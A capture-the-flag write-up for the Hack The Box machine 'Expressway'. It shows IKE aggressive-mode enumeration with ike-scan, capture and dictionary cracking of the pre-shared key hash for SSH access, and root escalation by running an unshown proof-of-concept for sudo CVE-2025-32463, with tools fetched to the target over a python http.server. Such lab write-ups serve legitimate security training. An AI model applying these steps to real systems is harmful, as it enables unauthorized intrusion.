HTB Expressway writeup

TLDR

IKE (IPsec) Aggressive mode leaked enough information to capture an authentication secret allowing SSH access as a local user. An outdated sudo then allowed privilege escalation to root with CVE-2025-32463.

Recon

Initial Nmap scan reveals nothing useful on TCP except SSH and basic information, but on UDP we see ISAKMP.

Nmap scan report for 10.10.11.87
Host is up (0.025s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP SCAN

PORT STATE SERVICE
500/udp open isakmp

After spending a bit of time researching IPsec (IKE) for further enumeration, using ike-scan gave us more information. Aggressive mode should not be used with IKE because it leaks extra information.

sudo ike-scan -M --aggressive 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=5afad9b521ac2d5a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.040 seconds (24.87 hosts/sec). 1 returned handshake; 0 returned notify

This scan shows that a proposed transform was accepted and that the server is willing to perform IKE negotiation. 

The encryption type was 3DES, the hash algorithm was SHA-1, and the DH group was 1024-bit MODP (group 2). This is weak and should not be used. Importantly, the authentication type is PSK (pre-shared key). 

We also get a valid group name (ID) "ike@expressway.htb". With a valid transform, the group name, and aggressive mode allowed, we can grab the hash of the PSK to crack.

Initial access

We also get a valid group name (ID) "ike@expressway.htb". With a valid transform, the group name, and aggressive mode allowed, we can simply grab the hash of the PSK to crack.

ike-scan -M -A -n ike@expressway.htb --pskcrack=hash.txt

and then crack with psk-crack

psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt 

Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA-1 hash 1366dc68a471575ea291f0fa4e7ff61407b5dfac
Ending psk-crack: 8045040 iterations in 13.778 seconds (583911.05 iterations/sec)

and we get the password "freakingrockstarontheroad"

We can then use this password to log in with ssh to the target as ike.

Privilege escalation

First, we upload linpeas using python -m http.server and curl it from the target.

We get pretty much nothing interesting except potential sudo vulnerabilities which were false positives for CVE-2021-3156. Looking more at sudo, we find that it is outdated and running version 1.9.17.

After researching this we find CVE-2025-32463 and a proof-of-concept (POC). We also upload the POC using python -m http.server, and upon giving it execute permissions with chmod +x and running it, we get root.

chmod +x privesc.sh
./privesc.sh

Then simply grab the root flag and exit.

Overall, this was a pretty fun box — fairly easy to get into after initial enumeration and research.